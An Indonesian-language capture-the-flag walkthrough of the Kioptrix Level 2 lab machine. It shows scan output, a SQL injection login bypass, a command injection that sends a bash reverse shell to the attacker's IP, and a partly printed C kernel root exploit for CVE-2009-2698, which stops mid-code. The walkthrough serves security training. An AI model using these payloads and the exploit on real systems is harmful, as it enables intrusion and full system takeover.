Serial Kioptrix yang ditulis oleh loneferret terus berlanjut pada seri kedua. Pada seri kali ini, pelajaran penting yang harus diingat dalam keamanan informasi adalah jangan percaya pada siapa pun pengguna aplikasi web anda. Secara singkat prinsip ini berbunyi “Never Trust Always Verify”. Mari kita ikuti perjalanan singkat pencarian kerentanan pada mesin Kioptrix-02 ini. Serupa dengan pendekatan pada kisah sebelumnya, kisah ini pun dibagi dalam tiga tahap, yaitu: Tahap Scanning dan Enumeration, Tahap Mapping Attack Surface serta Tahap Exploitation dan Post Exploitation.
Melalui kisah ini diharapkan segenap Penyelenggara Sistem Elektronik untuk senantiasa mewaspadai kerentanan pada sistemnya. Hal ini mengingat Pasal 11 pada Peraturan Pemerintah No. 71 Tahun 2019 tentang Penyelenggaraan Sistem dan Transaksi Elektronik telah mengamanatkan agar mampu menjamin keamanan pada Sistem Elektronik yang dikelolanya.
Tahap Pertama: Scanning dan Enumeration
Perangkat yang kita gunakan pada tahap pengumpulan informasi ini adalah nmap, ia adalah alat yang jadi populer sejak diangkat dalam film Hollywood berjudul The Matrix. Berdasarkan informasi yang dihimpun oleh alat ini, bahwa mesin Kioptrix-02 memiliki fungsi utama sebagai web server dimana ia menggunakan Apache (2.0.52) dan MySQL (versi belum diketahui) sebagai databasenya. Sedangkan sistem operasi yang digunakan adalah Centos (versi belum diketahui). Berikut ini adalah informasi yang dikumpulkan oleh ketiga perangkat tersebut:
root@kali2:~# nmap -p- -A 192.168.216.148 Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-18 20:06 PDT Nmap scan report for 192.168.216.148 (192.168.216.148) Host is up (0.00073s latency). Not shown: 65528 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99) | ssh-hostkey: | 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1) | 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA) |_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA) |_sshv1: Server supports SSHv1 80/tcp open http Apache httpd 2.0.52 ((CentOS)) |_http-server-header: Apache/2.0.52 (CentOS) |_http-title: Site doesn't have a title (text/html; charset=UTF-8). 111/tcp open rpcbind 2 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2 111/tcp rpcbind | 100000 2 111/udp rpcbind | 100024 1 652/udp status |_ 100024 1 655/tcp status 443/tcp open ssl/https? |_ssl-date: 2020-04-19T14:07:01+00:00; +10h59m40s from scanner time. | sslv2: | SSLv2 supported | ciphers: | SSL2_RC4_128_WITH_MD5 | SSL2_DES_64_CBC_WITH_MD5 | SSL2_RC4_128_EXPORT40_WITH_MD5 | SSL2_DES_192_EDE3_CBC_WITH_MD5 | SSL2_RC2_128_CBC_WITH_MD5 | SSL2_RC2_128_CBC_EXPORT40_WITH_MD5 |_ SSL2_RC4_64_WITH_MD5 631/tcp open ipp CUPS 1.1 | http-methods: |_ Potentially risky methods: PUT |_http-server-header: CUPS/1.1 |_http-title: 403 Forbidden 655/tcp open status 1 (RPC #100024) 3306/tcp open mysql MySQL (unauthorized) MAC Address: 00:0C:29:3F:59:E2 (VMware) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.9 - 2.6.30 Network Distance: 1 hop Host script results: |_clock-skew: mean: 10h59m39s, deviation: 0s, median: 10h59m39s TRACEROUTE HOP RTT ADDRESS 1 0.73 ms 192.168.216.148 (192.168.216.148) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 112.59 seconds
Informasi yang dihumpun sudah cukup, namun untuk layanan HTTP dibutuhkan pengumpulan informasi lebih lanjut. Untuk itu, maka kita akan menggunakan perangkat nikto, whatweb dan dirb. Berdasarkan informasi yang dihimpun oleh ketiga alat tersebut, ada beberapa informasi tambahan yaitu bahasa yang digunakan adalah PHP (versi 4.3.9) dan beberapa folder yang terpublikasi ke internet yaitu folder manual.
root@kali2:~# nikto -h http://192.168.216.148/ - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.216.148 + Target Hostname: 192.168.216.148 + Target Port: 80 + Start Time: 2020-04-18 20:21:45 (GMT-7) --------------------------------------------------------------------------- + Server: Apache/2.0.52 (CentOS) + Retrieved x-powered-by header: PHP/4.3.9 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + Apache/2.0.52 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE + Web Server returns a valid response with junk HTTP methods, this may cause false positives. + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST + OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + Uncommon header 'tcn' found, with contents: choice + OSVDB-3092: /manual/: Web server manual found. + OSVDB-3268: /icons/: Directory indexing found. + OSVDB-3268: /manual/images/: Directory indexing found. + Server may leak inodes via ETags, header found with file /icons/README, inode: 357810, size: 4872, mtime: Sat Mar 29 10:41:04 1980 + OSVDB-3233: /icons/README: Apache default file found. + 8725 requests: 1 error(s) and 17 item(s) reported on remote host + End Time: 2020-04-18 20:22:30 (GMT-7) (45 seconds) --------------------------------------------------------------------------- + 1 host(s) tested root@kali2:~# whatweb http://192.168.216.148 -v WhatWeb report for http://192.168.216.148 Status : 200 OK Title : <None> IP : 192.168.216.148 Country : RESERVED, ZZ Summary : HTTPServer[CentOS][Apache/2.0.52 (CentOS)], X-Powered-By[PHP/4.3.9], Apache[2.0.52], PasswordField[psw], PHP[4.3.9] Detected Plugins: [ Apache ] The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP server for modern operating systems including UNIX and Windows NT. The goal of this project is to provide a secure, efficient and extensible server that provides HTTP services in sync with the current HTTP standards. Version : 2.0.52 (from HTTP Server Header) Google Dorks: (3) Website : http://httpd.apache.org/ [ HTTPServer ] HTTP server header string. This plugin also attempts to identify the operating system from the server header. OS : CentOS String : Apache/2.0.52 (CentOS) (from server string) [ PHP ] PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. This plugin identifies PHP errors, modules and versions and extracts the local file path and username if present. Version : 4.3.9 Google Dorks: (2) Website : http://www.php.net/ [ PasswordField ] find password fields String : psw (from field name) [ X-Powered-By ] X-Powered-By HTTP header String : PHP/4.3.9 (from x-powered-by string) HTTP Headers: HTTP/1.1 200 OK Date: Sun, 19 Apr 2020 15:20:13 GMT Server: Apache/2.0.52 (CentOS) X-Powered-By: PHP/4.3.9 Content-Length: 667 Connection: close Content-Type: text/html; charset=UTF-8 root@kali2:~/Documents# dirb http://192.168.216.148 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Sat Apr 18 21:12:36 2020 URL_BASE: http://192.168.216.148/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.216.148/ ---- + http://192.168.216.148/cgi-bin/ (CODE:403|SIZE:291) + http://192.168.216.148/index.php (CODE:200|SIZE:667) ==> DIRECTORY: http://192.168.216.148/manual/ + http://192.168.216.148/usage (CODE:403|SIZE:288) ---- Entering directory: http://192.168.216.148/manual/ ---- ==> DIRECTORY: http://192.168.216.148/manual/de/ ==> DIRECTORY: http://192.168.216.148/manual/developer/ ==> DIRECTORY: http://192.168.216.148/manual/en/ ==> DIRECTORY: http://192.168.216.148/manual/faq/ ==> DIRECTORY: http://192.168.216.148/manual/fr/ ==> DIRECTORY: http://192.168.216.148/manual/howto/ ==> DIRECTORY: http://192.168.216.148/manual/images/ + http://192.168.216.148/manual/index.html (CODE:200|SIZE:7234) ==> DIRECTORY: http://192.168.216.148/manual/ja/ ==> DIRECTORY: http://192.168.216.148/manual/ko/ + http://192.168.216.148/manual/LICENSE (CODE:200|SIZE:11358) ==> DIRECTORY: http://192.168.216.148/manual/misc/ ==> DIRECTORY: http://192.168.216.148/manual/mod/ ==> DIRECTORY: http://192.168.216.148/manual/programs/ ==> DIRECTORY: http://192.168.216.148/manual/ru/ ==> DIRECTORY: http://192.168.216.148/manual/ssl/ ==> DIRECTORY: http://192.168.216.148/manual/style/ ---- Entering directory: http://192.168.216.148/manual/de/ ---- + http://192.168.216.148/manual/de/de (CODE:301|SIZE:321) ==> DIRECTORY: http://192.168.216.148/manual/de/developer/ + http://192.168.216.148/manual/de/en (CODE:301|SIZE:321) ==> DIRECTORY: http://192.168.216.148/manual/de/faq/ + http://192.168.216.148/manual/de/fr (CODE:301|SIZE:321) ==> DIRECTORY: http://192.168.216.148/manual/de/howto/ ==> DIRECTORY: http://192.168.216.148/manual/de/images/ + http://192.168.216.148/manual/de/index.html (CODE:200|SIZE:7317) + http://192.168.216.148/manual/de/ja (CODE:301|SIZE:321) + http://192.168.216.148/manual/de/ko (CODE:301|SIZE:321) + http://192.168.216.148/manual/de/LICENSE (CODE:200|SIZE:11358) ==> DIRECTORY: http://192.168.216.148/manual/de/misc/ ==> DIRECTORY: http://192.168.216.148/manual/de/mod/ ==> DIRECTORY: http://192.168.216.148/manual/de/programs/ + http://192.168.216.148/manual/de/ru (CODE:301|SIZE:321) ==> DIRECTORY: http://192.168.216.148/manual/de/ssl/ ==> DIRECTORY: http://192.168.216.148/manual/de/style/ ---- Entering directory: http://192.168.216.148/manual/developer/ ---- + http://192.168.216.148/manual/developer/index.html (CODE:200|SIZE:4770) ---- Entering directory: http://192.168.216.148/manual/en/ ---- + http://192.168.216.148/manual/en/de (CODE:301|SIZE:321) ==> DIRECTORY: http://192.168.216.148/manual/en/developer/ + http://192.168.216.148/manual/en/en (CODE:301|SIZE:321) ==> DIRECTORY: http://192.168.216.148/manual/en/faq/ + http://192.168.216.148/manual/en/fr (CODE:301|SIZE:321) ==> DIRECTORY: http://192.168.216.148/manual/en/howto/ ==> DIRECTORY: http://192.168.216.148/manual/en/images/ + http://192.168.216.148/manual/en/index.html (CODE:200|SIZE:7234) + http://192.168.216.148/manual/en/ja (CODE:301|SIZE:321) + http://192.168.216.148/manual/en/ko (CODE:301|SIZE:321) + http://192.168.216.148/manual/en/LICENSE (CODE:200|SIZE:11358) ==> DIRECTORY: http://192.168.216.148/manual/en/misc/ ==> DIRECTORY: http://192.168.216.148/manual/en/mod/ ==> DIRECTORY: http://192.168.216.148/manual/en/programs/ + http://192.168.216.148/manual/en/ru (CODE:301|SIZE:321) ==> DIRECTORY: http://192.168.216.148/manual/en/ssl/ ==> DIRECTORY: http://192.168.216.148/manual/en/style/ ---- Entering directory: http://192.168.216.148/manual/faq/ ---- + http://192.168.216.148/manual/faq/index.html (CODE:200|SIZE:3564) ---- Entering directory: http://192.168.216.148/manual/fr/ ---- + http://192.168.216.148/manual/fr/de (CODE:301|SIZE:321) ==> DIRECTORY: http://192.168.216.148/manual/fr/developer/ + http://192.168.216.148/manual/fr/en (CODE:301|SIZE:321) ==> DIRECTORY: http://192.168.216.148/manual/fr/faq/ + http://192.168.216.148/manual/fr/fr (CODE:301|SIZE:321) ==> DIRECTORY: http://192.168.216.148/manual/fr/howto/ ==> DIRECTORY: http://192.168.216.148/manual/fr/images/ + http://192.168.216.148/manual/fr/index.html (CODE:200|SIZE:7234) + http://192.168.216.148/manual/fr/ja (CODE:301|SIZE:321) + http://192.168.216.148/manual/fr/ko (CODE:301|SIZE:321) + http://192.168.216.148/manual/fr/LICENSE (CODE:200|SIZE:11358) ==> DIRECTORY: http://192.168.216.148/manual/fr/misc/ ==> DIRECTORY: http://192.168.216.148/manual/fr/mod/ ==> DIRECTORY: http://192.168.216.148/manual/fr/programs/ + http://192.168.216.148/manual/fr/ru (CODE:301|SIZE:321) ==> DIRECTORY: http://192.168.216.148/manual/fr/ssl/ ==> DIRECTORY: http://192.168.216.148/manual/fr/style/ ---- Entering directory: http://192.168.216.148/manual/howto/ ---- + http://192.168.216.148/manual/howto/index.html (CODE:200|SIZE:5685) ---- Entering directory: http://192.168.216.148/manual/images/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.216.148/manual/ja/ ---- + http://192.168.216.148/manual/ja/de (CODE:301|SIZE:321) ==> DIRECTORY: http://192.168.216.148/manual/ja/developer/ + http://192.168.216.148/manual/ja/en (CODE:301|SIZE:321) ==> DIRECTORY: http://192.168.216.148/manual/ja/faq/ + http://192.168.216.148/manual/ja/fr (CODE:301|SIZE:321) ==> DIRECTORY: http://192.168.216.148/manual/ja/howto/ ==> DIRECTORY: http://192.168.216.148/manual/ja/images/ + http://192.168.216.148/manual/ja/index.html (CODE:200|SIZE:7227) + http://192.168.216.148/manual/ja/ja (CODE:301|SIZE:321) + http://192.168.216.148/manual/ja/ko (CODE:301|SIZE:321) + http://192.168.216.148/manual/ja/LICENSE (CODE:200|SIZE:11358) ==> DIRECTORY: http://192.168.216.148/manual/ja/misc/ ==> DIRECTORY: http://192.168.216.148/manual/ja/mod/ ==> DIRECTORY: http://192.168.216.148/manual/ja/programs/ + http://192.168.216.148/manual/ja/ru (CODE:301|SIZE:321) ==> DIRECTORY: http://192.168.216.148/manual/ja/ssl/ ==> DIRECTORY: http://192.168.216.148/manual/ja/style/ ---- Entering directory: http://192.168.216.148/manual/ko/ ---- + http://192.168.216.148/manual/ko/de (CODE:301|SIZE:321) ==> DIRECTORY: http://192.168.216.148/manual/ko/developer/ + http://192.168.216.148/manual/ko/en (CODE:301|SIZE:321) ==> DIRECTORY: http://192.168.216.148/manual/ko/faq/ + http://192.168.216.148/manual/ko/fr (CODE:301|SIZE:321) ==> DIRECTORY: http://192.168.216.148/manual/ko/howto/ ==> DIRECTORY: http://192.168.216.148/manual/ko/images/ + http://192.168.216.148/manual/ko/index.html (CODE:200|SIZE:6954) + http://192.168.216.148/manual/ko/ja (CODE:301|SIZE:321) + http://192.168.216.148/manual/ko/ko (CODE:301|SIZE:321) + http://192.168.216.148/manual/ko/LICENSE (CODE:200|SIZE:11358) ==> DIRECTORY: http://192.168.216.148/manual/ko/misc/ ==> DIRECTORY: http://192.168.216.148/manual/ko/mod/ ==> DIRECTORY: http://192.168.216.148/manual/ko/programs/ + http://192.168.216.148/manual/ko/ru (CODE:301|SIZE:321) ==> DIRECTORY: http://192.168.216.148/manual/ko/ssl/ ==> DIRECTORY: http://192.168.216.148/manual/ko/style/ ---- Entering directory: http://192.168.216.148/manual/misc/ ---- + http://192.168.216.148/manual/misc/index.html (CODE:200|SIZE:5491) ---- Entering directory: http://192.168.216.148/manual/mod/ ---- + http://192.168.216.148/manual/mod/index.html (CODE:200|SIZE:13437) ---- Entering directory: http://192.168.216.148/manual/programs/ ---- + http://192.168.216.148/manual/programs/index.html (CODE:200|SIZE:4664) ---- Entering directory: http://192.168.216.148/manual/ru/ ---- ^? ^? + http://192.168.216.148/manual/ru/de (CODE:301|SIZE:321) ==> DIRECTORY: http://192.168.216.148/manual/ru/developer/ + http://192.168.216.148/manual/ru/en (CODE:301|SIZE:321) ==> DIRECTORY: http://192.168.216.148/manual/ru/faq/ + http://192.168.216.148/manual/ru/fr (CODE:301|SIZE:321) ==> DIRECTORY: http://192.168.216.148/manual/ru/howto/ ==> DIRECTORY: http://192.168.216.148/manual/ru/images/ + http://192.168.216.148/manual/ru/index.html (CODE:200|SIZE:7277) + http://192.168.216.148/manual/ru/ja (CODE:301|SIZE:321) + http://192.168.216.148/manual/ru/ko (CODE:301|SIZE:321) + http://192.168.216.148/manual/ru/LICENSE (CODE:200|SIZE:11358) ==> DIRECTORY: http://192.168.216.148/manual/ru/misc/ ==> DIRECTORY: http://192.168.216.148/manual/ru/mod/ ==> DIRECTORY: http://192.168.216.148/manual/ru/programs/ + http://192.168.216.148/manual/ru/ru (CODE:301|SIZE:321) ==> DIRECTORY: http://192.168.216.148/manual/ru/ssl/ ==> DIRECTORY: http://192.168.216.148/manual/ru/style/ ---- Entering directory: http://192.168.216.148/manual/ssl/ ---- + http://192.168.216.148/manual/ssl/index.html (CODE:200|SIZE:3988) ---- Entering directory: http://192.168.216.148/manual/style/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.216.148/manual/de/developer/ ---- + http://192.168.216.148/manual/de/developer/index.html (CODE:200|SIZE:4770) ---- Entering directory: http://192.168.216.148/manual/de/faq/ ---- + http://192.168.216.148/manual/de/faq/index.html (CODE:200|SIZE:3564) ---- Entering directory: http://192.168.216.148/manual/de/howto/ ---- + http://192.168.216.148/manual/de/howto/index.html (CODE:200|SIZE:5685) ---- Entering directory: http://192.168.216.148/manual/de/images/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.216.148/manual/de/misc/ ---- + http://192.168.216.148/manual/de/misc/index.html (CODE:200|SIZE:5491) ---- Entering directory: http://192.168.216.148/manual/de/mod/ ---- + http://192.168.216.148/manual/de/mod/index.html (CODE:200|SIZE:13561) ---- Entering directory: http://192.168.216.148/manual/de/programs/ ---- + http://192.168.216.148/manual/de/programs/index.html (CODE:200|SIZE:4664) ---- Entering directory: http://192.168.216.148/manual/de/ssl/ ---- + http://192.168.216.148/manual/de/ssl/index.html (CODE:200|SIZE:3988) ---- Entering directory: http://192.168.216.148/manual/de/style/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.216.148/manual/en/developer/ ---- + http://192.168.216.148/manual/en/developer/index.html (CODE:200|SIZE:4770) ---- Entering directory: http://192.168.216.148/manual/en/faq/ ---- + http://192.168.216.148/manual/en/faq/index.html (CODE:200|SIZE:3564) ---- Entering directory: http://192.168.216.148/manual/en/howto/ ---- + http://192.168.216.148/manual/en/howto/index.html (CODE:200|SIZE:5685) ---- Entering directory: http://192.168.216.148/manual/en/images/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.216.148/manual/en/misc/ ---- + http://192.168.216.148/manual/en/misc/index.html (CODE:200|SIZE:5491) ---- Entering directory: http://192.168.216.148/manual/en/mod/ ---- + http://192.168.216.148/manual/en/mod/index.html (CODE:200|SIZE:13437) ---- Entering directory: http://192.168.216.148/manual/en/programs/ ---- + http://192.168.216.148/manual/en/programs/index.html (CODE:200|SIZE:4664) ---- Entering directory: http://192.168.216.148/manual/en/ssl/ ---- + http://192.168.216.148/manual/en/ssl/index.html (CODE:200|SIZE:3988) ---- Entering directory: http://192.168.216.148/manual/en/style/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.216.148/manual/fr/developer/ ---- + http://192.168.216.148/manual/fr/developer/index.html (CODE:200|SIZE:4770) ---- Entering directory: http://192.168.216.148/manual/fr/faq/ ---- + http://192.168.216.148/manual/fr/faq/index.html (CODE:200|SIZE:3564) ---- Entering directory: http://192.168.216.148/manual/fr/howto/ ---- + http://192.168.216.148/manual/fr/howto/index.html (CODE:200|SIZE:5685) ---- Entering directory: http://192.168.216.148/manual/fr/images/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.216.148/manual/fr/misc/ ---- + http://192.168.216.148/manual/fr/misc/index.html (CODE:200|SIZE:5491) ---- Entering directory: http://192.168.216.148/manual/fr/mod/ ---- + http://192.168.216.148/manual/fr/mod/index.html (CODE:200|SIZE:13437) ---- Entering directory: http://192.168.216.148/manual/fr/programs/ ---- + http://192.168.216.148/manual/fr/programs/index.html (CODE:200|SIZE:4664) ---- Entering directory: http://192.168.216.148/manual/fr/ssl/ ---- + http://192.168.216.148/manual/fr/ssl/index.html (CODE:200|SIZE:3988) ---- Entering directory: http://192.168.216.148/manual/fr/style/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.216.148/manual/ja/developer/ ---- + http://192.168.216.148/manual/ja/developer/index.html (CODE:200|SIZE:4770) ---- Entering directory: http://192.168.216.148/manual/ja/faq/ ---- + http://192.168.216.148/manual/ja/faq/index.html (CODE:200|SIZE:3564) ---- Entering directory: http://192.168.216.148/manual/ja/howto/ ---- + http://192.168.216.148/manual/ja/howto/index.html (CODE:200|SIZE:5607) ---- Entering directory: http://192.168.216.148/manual/ja/images/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.216.148/manual/ja/misc/ ---- + http://192.168.216.148/manual/ja/misc/index.html (CODE:200|SIZE:5491) ---- Entering directory: http://192.168.216.148/manual/ja/mod/ ---- + http://192.168.216.148/manual/ja/mod/index.html (CODE:200|SIZE:13298) ---- Entering directory: http://192.168.216.148/manual/ja/programs/ ---- + http://192.168.216.148/manual/ja/programs/index.html (CODE:200|SIZE:4664) ---- Entering directory: http://192.168.216.148/manual/ja/ssl/ ---- + http://192.168.216.148/manual/ja/ssl/index.html (CODE:200|SIZE:3957) ---- Entering directory: http://192.168.216.148/manual/ja/style/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.216.148/manual/ko/developer/ ---- + http://192.168.216.148/manual/ko/developer/index.html (CODE:200|SIZE:4770) ---- Entering directory: http://192.168.216.148/manual/ko/faq/ ---- + http://192.168.216.148/manual/ko/faq/index.html (CODE:200|SIZE:3371) ---- Entering directory: http://192.168.216.148/manual/ko/howto/ ---- + http://192.168.216.148/manual/ko/howto/index.html (CODE:200|SIZE:5299) ---- Entering directory: http://192.168.216.148/manual/ko/images/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.216.148/manual/ko/misc/ ---- + http://192.168.216.148/manual/ko/misc/index.html (CODE:200|SIZE:5491) ---- Entering directory: http://192.168.216.148/manual/ko/mod/ ---- + http://192.168.216.148/manual/ko/mod/index.html (CODE:200|SIZE:12795) ---- Entering directory: http://192.168.216.148/manual/ko/programs/ ---- + http://192.168.216.148/manual/ko/programs/index.html (CODE:200|SIZE:4543) ---- Entering directory: http://192.168.216.148/manual/ko/ssl/ ---- + http://192.168.216.148/manual/ko/ssl/index.html (CODE:200|SIZE:3988) ---- Entering directory: http://192.168.216.148/manual/ko/style/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.216.148/manual/ru/developer/ ---- + http://192.168.216.148/manual/ru/developer/index.html (CODE:200|SIZE:4770) ---- Entering directory: http://192.168.216.148/manual/ru/faq/ ---- + http://192.168.216.148/manual/ru/faq/index.html (CODE:200|SIZE:3564) ---- Entering directory: http://192.168.216.148/manual/ru/howto/ ---- + http://192.168.216.148/manual/ru/howto/index.html (CODE:200|SIZE:5685) ---- Entering directory: http://192.168.216.148/manual/ru/images/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.216.148/manual/ru/misc/ ---- + http://192.168.216.148/manual/ru/misc/index.html (CODE:200|SIZE:5491) ---- Entering directory: http://192.168.216.148/manual/ru/mod/ ---- + http://192.168.216.148/manual/ru/mod/index.html (CODE:200|SIZE:13437) ---- Entering directory: http://192.168.216.148/manual/ru/programs/ ---- + http://192.168.216.148/manual/ru/programs/index.html (CODE:200|SIZE:5016) ---- Entering directory: http://192.168.216.148/manual/ru/ssl/ ---- + http://192.168.216.148/manual/ru/ssl/index.html (CODE:200|SIZE:3988) ---- Entering directory: http://192.168.216.148/manual/ru/style/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ----------------- END_TIME: Sat Apr 18 21:21:59 2020 DOWNLOADED: 262884 - FOUND: 102
Tidak ada yang menarik pada folder manual, setelah ditelusuri isinya tak lebih dari manual penggunaan Apache Web Server. File yang menarik untuk ditelusuri adalah index.php berupa form login, sebagaimana gambar 1 berikut ini:

Tahap Kedua : Mapping Attack Surface
Berdasarkan informasi yang dihimpun pada Tahap terdahulu, dapat dipetakan potensi serangan yang dapat dilakukan (lihat Gambar 2) pada tiga layanan yaitu SSH, HTTP dan ipp. Untuk layanan SSH tidak ditemukan adanya potensi Remote Code Execution (RCE) karena versi 3.9p1 pada OpenSSH tidak ditemukan kerentanan Buffer Over Flow, demikian juga untuk layanan ipp (CUPS 1.1). Sedangkan potensi serangan brute force pada layanan SSH tidak dapat dilakukan karena tidak ditemukan adanya user account yang valid.

Dengan demikian potensi serangan yang valid kini adalah kerentanan injection, yaitu SQL Injection. Setelah melakukan percobaan beberapa kali, maka input dengan admin’ or 1=1# pada kolom Username ternyata dapat mem-bypass form login pada mesin Kiptrix-02, sebagaimana dua gambar berikut ini:


adalah sasaran serangan potensial
Apabila form tersebut dianalisis lebih lanjut, dapat disimpulkan bahwa ia dapat melakukan eksekusi beberapa perintah pada sistem operasi secara sekaligus dengan cara menggabungkan beberapa perintah dengan simbol “;” atau titik koma. Hal ini merupakan feature dari sistem operasi Linux. Hal tersebut dapat dilihat pada dua gambar berikut ini:


Tahap Ketiga : Exploitation dan Post-Exploitation
Berdasarkan analisis pada tahap terdahulu terlihat bahwa kolom Username pada file index.php memiliki kerentanan yang valid dan sangat potensial sebagai celah untuk menguasai sistem secara keseluruhan. Untuk itu pada Tahap Exploitation dan Post-Exploitation ini maka serangan siber akan difokuskan pada kerentanan tersebut.
Maka langkah serangan yang pertama dilakukan adalah mendapatkan limited shell. Caranya dengan membuat mesin Kioptrix-02 menghubungi penyerang melalui teknik reverse shell. Adapun perintah reverse shell yang akan digunakan pada form tersebut dijadikan dalam satu rangkaian perintah bersama perintah ping, yaitu: 127.0.0.1;bash -i >& /dev/tcp/192.168.216.149/4444 0>&1. Sedangkan pada sisi penyerang digunakan perangkat netcat untuk membuka port 4444 (perhatikan gambar 7).


Langkah selanjutnya adalah meningkatkan hak akses menjadi root. Untuk itu, kita akan menghimpun berbagai informasi penting. Informasi yang paling penting adalah versi sistem operasi, tujuannya untuk melihat adanya potensi serangan dengan kernel exploitation. Dengan menggunakan perintah uname -a dan lsb_release -a dapat diidentifikasi bahwa versi Centos yang digunakan adalah versi 4.5.
Dengan melakukan riset dapat diketahui adanya kerenatanan Buffer Over Flow pada Centos versi 4.5. Kerentanan teknis pada kernel tersebut ditemukan oleh Tavis Ormandy dan Julian Tinnes dari Google Security Team, dengan kode kerentananya adalah CVE-2009-2698. Adapun file exploit-nya adalah sebagai berikut:
/* ** ** 0x82-CVE-2009-2698 ** Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit ** ** Tested White Box 4(2.6.9-5.ELsmp), ** CentOS 4.4(2.6.9-42.ELsmp), CentOS 4.5(2.6.9-55.ELsmp), ** Fedora Core 4(2.6.11-1.1369_FC4smp), Fedora Core 5(2.6.15-1.2054_FC5), ** Fedora Core 6(2.6.18-1.2798.fc6). ** ** -- ** Discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team. ** Thankful to them. ** ** -- ** bash$ gcc -o 0x82-CVE-2009-2698 0x82-CVE-2009-2698.c && ./0x82-CVE-2009-2698 ** sh-3.1# id ** uid=0(root) gid=0(root) groups=500(x82) context=user_u:system_r:unconfined_t ** sh-3.1# ** -- ** exploit by <p0c73n1(at)gmail(dot)com>. ** */ #include <stdio.h> #include <unistd.h> #include <string.h> #include <sys/socket.h> #include <sys/mman.h> #include <fcntl.h> #include <sys/personality.h> unsigned int uid, gid; void get_root_uid(unsigned *task) { unsigned *addr=task; while(addr[0]!=uid||addr[1]!=uid||addr[2]!=uid||addr[3]!=uid){ addr++; } addr[0]=addr[1]=addr[2]=addr[3]=0; /* set uids */ addr[4]=addr[5]=addr[6]=addr[7]=0; /* set gids */ return; } void exploit(); void kernel_code() { asm("exploit:\n" "push %eax\n" "movl $0xfffff000,%eax\n" "andl %esp,%eax\n" "pushl (%eax)\n" "call get_root_uid\n" "addl $4,%esp\n" "popl %eax\n"); return; } void *kernel=kernel_code; int main(int argc, char **argv) { int fd=0; char buf[1024]; struct sockaddr x0x; void *zero_page; uid=getuid(); gid=getgid(); if(uid==0){ fprintf(stderr,"[-] check ur uid\n"); return -1; } if(personality(0xffffffff)==PER_SVR4){ if(mprotect(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC)==-1){ perror("[-] mprotect()"); return -1; } } else if((zero_page=mmap(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE,0,0))==MAP_FAILED){ perror("[-] mmap()"); return -1; } *(unsigned long *)0x0=0x90909090; *(char *)0x00000004=0x90; /* +1 */ *(char *)0x00000005=0xff; *(char *)0x00000006=0x25; *(unsigned long *)0x00000007=(unsigned long)&kernel; *(char *)0x0000000b=0xc3; if((fd=socket(PF_INET,SOCK_DGRAM,0))==-1){ perror("[-] socket()"); return -1; } x0x.sa_family=AF_UNSPEC; 